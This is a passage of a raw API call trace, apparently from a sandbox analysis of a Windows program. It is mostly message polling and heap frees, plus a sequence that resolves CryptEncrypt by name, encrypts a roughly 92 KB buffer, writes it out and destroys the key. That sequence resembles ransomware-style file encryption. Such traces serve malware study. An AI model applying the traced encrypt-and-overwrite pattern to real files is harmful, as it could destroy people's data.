(in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0151.039] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0151.039] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0151.040] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.040] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.040] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0151.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0151.040] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0151.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cd8 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0151.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.042] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37d6a20 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa390 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0151.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0151.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa3d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.045] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x169ce, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x169d0) returned 1 [0151.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.045] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.045] CharLowerBuffW (in: lpsz="byte[92624]", cchLength=0xb | out: lpsz="byte[92624]") returned 0xb [0151.055] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.058] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.058] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.059] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.059] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0151.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0151.061] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa4c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0151.061] CryptEncrypt (in: hKey=0x9e1db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37d6a20*, pdwDataLen=0x8cef60*=0x169ce, dwBufLen=0x169d0 | out: pbData=0x37d6a20*, pdwDataLen=0x8cef60*=0x169d0) returned 1 [0151.064] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.064] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.065] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.068] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.151] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.151] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.151] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.151] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.151] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.151] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.151] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.151] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.151] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.152] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.152] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.152] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.152] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0151.152] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.152] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.152] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.152] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.152] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.152] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0151.152] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.152] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0151.152] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.164] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.165] WriteFile (in: hFile=0x4b0, lpBuffer=0x2ac5de8*, nNumberOfBytesToWrite=0x169d0, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2ac5de8*, lpNumberOfBytesWritten=0x8cf5e4*=0x169d0, lpOverlapped=0x0) returned 1 [0151.167] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.167] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0151.167] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0151.167] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.167] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0151.168] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.168] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.168] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0151.168] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.168] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0151.168] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.168] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0151.168] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0151.168] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa258, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0151.168] CryptDestroyKey (hKey=0x9e1db8) returned 1 [0151.168] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.168] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.168] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0151.168] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.168] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0151.168] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.168] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.168] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0151.168] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.168] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0151.168] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.168] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.169] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0151.169] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.169] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0151.169] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0151.169] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, 